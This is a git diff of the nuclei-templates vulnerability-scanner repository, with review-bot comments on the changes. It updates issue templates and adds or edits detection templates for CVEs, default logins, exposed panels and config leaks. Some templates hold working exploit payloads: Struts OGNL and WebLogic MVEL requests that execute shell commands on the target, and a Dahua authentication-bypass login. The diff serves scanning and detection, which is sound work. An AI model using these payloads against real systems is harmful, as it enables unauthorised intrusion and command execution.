diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
deleted file mode 100644
index c7e1e98e00..0000000000
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ /dev/null
@@ -1,32 +0,0 @@
----
-name: Bug report
-about: Create a issue to help us improve
-title: "[Bug] "
-labels: ''
-assignees: ''
-
----
-
-**Nuclei version**
-
-```
-nuclei -version
-```
-
-**Nuclei template version**
-
-```
-cat ~/.nuclei-config.json
-```
-
-**Describe the bug**
-A clear and concise description of what the bug is.
-
-**Commands to reproduce**
-
-```
-nuclei -t xxx -target xxx
-```
-
-**Screenshots**
-If applicable, add screenshots to help explain your problem.
diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml
new file mode 100644
index 0000000000..9d81aa509c
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/config.yml
@@ -0,0 +1,14 @@
+blank_issues_enabled: false
+
+contact_links:
+ - name: Ask an question / advise on using nuclei-templates
+ url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
+ about: Ask a question or request support for using nuclei-templates
+
+ - name: Share idea / feature to discuss for nuclei-templates
+ url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
+ about: Share idea / feature to discuss for nuclei-templates
+
+ - name: Connect with PD Team & Community (Discord)
+ url: https://discord.gg/projectdiscovery
+ about: Connect with PD Team & Community for direct communication
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/false-positive.md b/.github/ISSUE_TEMPLATE/false-positive.md
index 866365bd95..3cc006eb06 100644
--- a/.github/ISSUE_TEMPLATE/false-positive.md
+++ b/.github/ISSUE_TEMPLATE/false-positive.md
@@ -1,30 +1,24 @@
---
name: False Positive
-about: 'Create an issue if you found false positive results. '
-title: "[false-positive] template-name "
+about: 'Issue for template producing false positive results.'
labels: 'false-positive'
-assignees: ''
---
-**Nuclei version**
+
-```
-nuclei -version
-```
+### Nuclei Version:
-**Nuclei template version**
+
-```
-cat ~/.nuclei-config.json
-```
+### Template file:
-**Template ID**
+
-Please submit the ID template producing false-positive results.
+### Command to reproduce:
-**Commands to Reproduce**
+
+
-```
-nuclei -t template_id -target ?
-```
+### Anything else:
+
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md
index fbb3ffc5ad..cb6be4c6be 100644
--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -1,16 +1,18 @@
---
name: Feature request
-about: Suggest an idea to improve nuclei templates
-title: "[Feature] "
-labels: ''
-assignees: ''
-
+about: Request feature to implement in this project
+labels: 'Type: Enhancement'
---
-**Is your feature request related to a problem? Please describe.**
+
-A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+### Please describe your feature request:
+
-**Describe the solution you'd like**
-
-A clear and concise description of what you want to happen.
+### Describe the use case of this feature:
+
diff --git a/.github/ISSUE_TEMPLATE/issue-report.md b/.github/ISSUE_TEMPLATE/issue-report.md
new file mode 100644
index 0000000000..c6f6f07f53
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/issue-report.md
@@ -0,0 +1,21 @@
+---
+name: Issue report
+about: "Issue to report invalid template"
+labels: 'Type: Bug'
+
+---
+
+
+
+
+
+### Issue description:
+
+
+
+### Anything else:
+
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md
index c929e00068..b7aa1c4938 100644
--- a/.github/ISSUE_TEMPLATE/submit-template.md
+++ b/.github/ISSUE_TEMPLATE/submit-template.md
@@ -1,15 +1,23 @@
---
-name: Submit Template
-about: Submit nuclei template using issue
-title: "[nuclei-template] template-name"
+name: Template Contribution
+about: Contributing nuclei template using GitHub Issue
labels: 'nuclei-template'
-assignees: ''
-
---
-**Template Details**
+### Template Information:
+
+
+
+
+
+### Nuclei Template:
+
+
+
```yaml
-nuclei template goes here
```
+
+
+
\ No newline at end of file
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 26f85418fb..bef00b4d7a 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
-
-files:
- - "token-spray/"
-
-
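Review bot: Dropping the `files:` stanza removes the only path-based exclusion, so everything under `token-spray/` now runs in a default invocation unless the `tags:` list above this hunk (not visible here) still filters it. The directory name suggests templates that submit user-supplied API tokens to third-party endpoints, which is presumably why they were opted out, so this should be a deliberate decision rather than a side effect of the cleanup. If a tag now covers them, say so in the comment that survives at the top of the hunk, e.g. `# token-spray templates are excluded via the tags list above`; otherwise keep `files:` with `- "token-spray/"`.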
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index d322c7908c..67158a4a69 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
- GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+ GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
payloads:
params:
@@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
+ condition: or
status:
- 200
- 400
- condition: or
+
- type: regex
+ part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- part: body
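Review bot: The `{1,4}` digit bound in the regex matcher (a context line in this hunk) misses `id` output for five-digit accounts such as `uid=65534(nobody)` or directory-backed users, so a successful command execution can go unreported; since the status matcher also accepts 400, the regex carries the whole detection weight. `[0-9]+` is the safer quantifier and the name class should allow `_` and `-`, which are legal in account names: `- "((u|g)id|groups)=[0-9]+\\([a-z0-9_-]+\\)"`. Moving `part: body` above the pattern is fine and matches the other templates in this commit.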
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 0f87ecde9f..7560cc422d 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
- attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
+ condition: and
words:
- "environment variable"
- - "display library search paths"
- condition: and
+ - "display library search paths"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml
index 163e4ead10..24cfb039e5 100644
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
- attack: sniper
+
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
words:
- "
Dashboard"
diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml
new file mode 100644
index 0000000000..b28e4ae9bf
--- /dev/null
+++ b/cves/2019/CVE-2019-2729.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-2729
+
+info:
+ name: Oracle WebLogic Server Administration Console Handle RCE
+ author: igibanez
+ severity: critical
+ description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-2729
+ tags: cve,cve2019,oracle,rce,weblogic
+
+requests:
+ - raw:
+ - |
+ POST /wls-wsat/CoordinatorPortType HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+ xxxxorg.slf4j.ext.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${IFS}9272-9102-EVC|revconnectionHandlertrue]]>
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "CVE-2019-2729"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 382be20081..e36159a674 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
- cmd: §exec§
- Connection: close
+ cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- condition: or
- part: body
- type: status
status:
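Review bot: Removing `part: body` from the regex matcher widens it to the whole response including headers; for `root:.*:0:0:` and `\[(font|extension|file)s\]` that is probably harmless, but it is inconsistent with the CVE-2013-2251 change in the same commit, which keeps `part: body` and only moves it above the pattern. Keep the scoping explicit by adding `part: body` back under `condition: or`. The hunk header indicates two more lines below `status:` that are not visible here.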
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index dd62e8fa68..80017aa104 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- attack: sniper
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml
index fac0befccd..20bf91e5e0 100644
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
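Review bot: `skip-variables-check: true` is added without saying why, and the reason is not obvious to the next maintainer: the `{{228*'98'}}` in the two paths is the SSTI probe sent to the target, not a nuclei variable, so the pre-flight check would otherwise reject the template as using an undefined variable. Add a comment on the new line, `skip-variables-check: true  # {{228*'98'}} is the SSTI probe, not a nuclei variable`, so nobody "fixes" it by defining a payload.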
diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml
new file mode 100644
index 0000000000..2dc86669e2
--- /dev/null
+++ b/cves/2021/CVE-2021-20031.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-20031
+
+info:
+ name: Sonicwall SonicOS 7.0 - Host Header Injection
+ author: gy741
+ severity: medium
+ description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
+ reference:
+ - https://www.exploit-db.com/exploits/50414
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20031
+ metadata:
+ google-dork: inurl:"auth.html" intitle:"SonicWall"
+ tags: cve,cve2021,sonicwall,redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-20031
+ cwe-id: CWE-601
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{randstr}}.tld
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'https://{{randstr}}.tld/auth.html'
+ - 'Please be patient as you are being re-directed'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
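Review bot: The `name` says SonicOS 7.0 while the `description` says the issue was found in "Sonicwall NAS, SonicWall Analyzer version 8.5.0", so a reader cannot tell which product this template targets; align them with the advisory in the references. The description also ends mid-sentence ("during various other attack"), so finish it, e.g. `... hide behind during various other attacks.` The detection itself looks sound: the reflected `https://{{randstr}}.tld/auth.html` ties the match to the injected Host value rather than to a static string.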
diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml
new file mode 100644
index 0000000000..7797b9e08e
--- /dev/null
+++ b/cves/2021/CVE-2021-33044.yaml
@@ -0,0 +1,54 @@
+id: CVE-2021-33044
+
+info:
+ name: Dahua IPC/VTH/VTO devices Authentication Bypass
+ author: gy741
+ severity: critical
+ description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
+ reference:
+ - https://github.com/dorkerdevil/CVE-2021-33044
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
+ - https://seclists.org/fulldisclosure/2021/Oct/13
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-33044
+ cwe-id: CWE-287
+ tags: dahua,cve,cve2021,auth-bypass
+
+requests:
+ - raw:
+ - |
+ POST /RPC2_Login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/javascript, */*; q=0.01
+ Connection: close
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Origin: http://{{Hostname}}/
+ Referer: http://{{Hostname}}/
+
+ {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "true"
+ - "id"
+ - "params"
+ - "session"
+ condition: and
+
+ extractors:
+ - type: regex
+ group: 1
+ part: body
+ regex:
+ - ',"result":true,"session":"([a-z]+)"\}'
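Review bot: The word matcher accepts `true`, `id`, `params` and `session` anywhere in the body, but those are generic JSON keys that a rejected login presumably returns as well, and `true` can be satisfied by any boolean in an error payload, so a critical auth-bypass verdict rests on very little. The extractor below already keys on the real success marker; match on that instead by replacing the four words with `- '"result":true'` and `- '"session":"'`. Minor: `Origin: http://{{Hostname}}/` carries a trailing slash a browser would not send; `Origin: http://{{Hostname}}` is the conventional form.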
diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml
index 30f759b9cb..125010431f 100644
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@@ -1,4 +1,5 @@
id: grafana-default-login
+
info:
name: Grafana Default Login
author: pdteam
@@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
-
password:
- prom-operator
- admin
@@ -35,16 +35,14 @@ requests:
matchers:
- type: word
words:
- - grafana_session
+ - "grafana_session" # Login cookie
part: header
- # Check for 'grafana_session' cookie on valid login in the response header.
- type: word
- words:
- - Logged in
part: body
- # Check for valid string on valid login.
+ words:
+ - "Logged in" # Logged in keyword
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml
index aa854686cb..beada2b11a 100644
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@@ -20,15 +20,13 @@ requests:
username:
- admin
- attack: sniper
-
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
- condition: and
- type: status
status:
diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml
index 9c7aa9d12a..959da5926b 100644
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@@ -18,22 +18,21 @@ requests:
payloads:
password:
- - 12345
- attack: sniper
+ - "12345"
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "session_id="
- "resource"
- condition: and
- type: word
- words:
- - "Invalid Password"
part: body
negative: true
+ words:
+ - "Invalid Password"
- type: status
status:
diff --git a/exposed-panels/alienvault-usm.yaml b/exposed-panels/alienvault-usm.yaml
new file mode 100644
index 0000000000..e9d7abbcf2
--- /dev/null
+++ b/exposed-panels/alienvault-usm.yaml
@@ -0,0 +1,23 @@
+id: alienVault-usm
+
+info:
+ name: AlienVault USM
+ author: dhiyaneshDK
+ severity: info
+ tags: panel
+ metadata:
+ shodan: 'http.title:"AlienVault USM"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ossim/session/login.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'AlienVault USM'
+ - type: status
+ status:
+ - 200
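Review bot: `id: alienVault-usm` mixes case, unlike the filename `alienvault-usm.yaml` and every other id in this commit, which are lowercase kebab-case; ids are used as filter keys and in output, so the inconsistency will bite anyone grepping or excluding by id. Change it to `id: alienvault-usm`.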
diff --git a/exposed-panels/exsi-system.yaml b/exposed-panels/exsi-system.yaml
new file mode 100644
index 0000000000..709f85f239
--- /dev/null
+++ b/exposed-panels/exsi-system.yaml
@@ -0,0 +1,23 @@
+id: exsi-system
+
+info:
+ name: ESXi System
+ author: dhiyaneshDK
+ severity: info
+ tags: panel
+ metadata:
+ shodan: 'html:"esxUiApp"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ui/#/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'ng-app="esxUiApp"'
+ - type: status
+ status:
+ - 200
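Review bot: The path `{{BaseURL}}/ui/#/login` includes a URL fragment, which is never sent to the server, so the request effectively fetches `/ui/`; make that explicit with `- '{{BaseURL}}/ui/'` so the template does not look like it depends on the client-side route. The filename and `id: exsi-system` also misspell the product (ESXi), which the `name` field gets right; `id: esxi-system` with a matching filename would keep id, name and Shodan query consistent.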
diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml
new file mode 100644
index 0000000000..c4e1f09352
--- /dev/null
+++ b/exposed-panels/samsung-printer-detect.yaml
@@ -0,0 +1,24 @@
+id: samsung-printer-detect
+
+info:
+ name: SAMSUNG Printer Detection
+ author: pussycat0x
+ severity: info
+ tags: iot,panel
+ metadata:
+ fofa-dork: 'app="SAMSUNG-Printer"'
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sws/index.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ' SyncThru Web Service '
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/sql-monitor.yaml b/exposed-panels/sql-monitor.yaml
new file mode 100644
index 0000000000..d736a98730
--- /dev/null
+++ b/exposed-panels/sql-monitor.yaml
@@ -0,0 +1,23 @@
+id: sql-monitor
+
+info:
+ name: SQL Monitor
+ author: dhiyaneshDK
+ severity: info
+ tags: panel
+ metadata:
+ shodan: 'html:"SQL Monitor"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'JavaScript needs to be enabled for SQL Monitor to work properly.
'
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml
index af981920a3..e7d9ea7f28 100644
--- a/exposures/configs/github-workflows-disclosure.yaml
+++ b/exposures/configs/github-workflows-disclosure.yaml
@@ -36,6 +36,7 @@ requests:
- "{{BaseURL}}/.github/workflows/ci-daily.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml"
+ - "{{BaseURL}}/.github/workflows/snyk.yml"
matchers-condition: and
matchers:
diff --git a/exposures/configs/gruntfile-exposure.yaml b/exposures/configs/gruntfile-exposure.yaml
new file mode 100644
index 0000000000..a4fddba012
--- /dev/null
+++ b/exposures/configs/gruntfile-exposure.yaml
@@ -0,0 +1,29 @@
+id: gruntfile-exposure
+
+info:
+ name: Gruntfile Exposure
+ author: sbani
+ severity: info
+ reference: https://gruntjs.com/sample-gruntfile
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Gruntfile.js"
+ - "{{BaseURL}}/Gruntfile.coffee"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ condition: and
+ words:
+ - "module.exports"
+ - "grunt"
+
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml
new file mode 100644
index 0000000000..2be4dd0504
--- /dev/null
+++ b/exposures/configs/jetbrains-datasources.yaml
@@ -0,0 +1,24 @@
+id: jetbrains-datasource
+
+info:
+ name: Jetbrains IDE DataSources exposure
+ author: FlorianMaak
+ severity: info
+ description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.idea/dataSources.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DataSourceManagerImpl"
+ part: body
+
+ - type: status
+ status:
+ - 200
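Review bot: `id: jetbrains-datasource` does not match the filename `jetbrains-datasources.yaml`; the other new templates in this commit keep id and filename identical, so pick one spelling for both, e.g. `id: jetbrains-datasources`. A `reference:` pointing at JetBrains' description of `.idea/dataSources.xml` would also help a reader judge the severity, since the `description` already notes the file leads to per-datasource schema dumps.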
diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml
new file mode 100644
index 0000000000..bfc9ce9b45
--- /dev/null
+++ b/exposures/configs/prometheus-config-endpoint.yaml
@@ -0,0 +1,32 @@
+id: prometheus-config-endpoint
+
+info:
+ name: Prometheus config API endpoint
+ author: geeknik
+ severity: info
+ description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username).
+ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
+ tags: prometheus,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/status/config"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'job_name:'
+ - '{"status":"success","data":'
+ - 'targets:'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml
new file mode 100644
index 0000000000..0cefa431fc
--- /dev/null
+++ b/exposures/configs/prometheus-flags-endpoint.yaml
@@ -0,0 +1,37 @@
+id: prometheus-flags-endpoint
+
+info:
+ name: Prometheus flags API endpoint
+ author: geeknik
+ severity: info
+ description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
+ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
+ tags: prometheus,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/status/flags"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"data":'
+ - '"config.file":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ extractors:
+ - type: regex
+ name: web_admin_enabled
+ regex:
+ - '\"web\.enable\-admin\-api\"\: \"true\"'
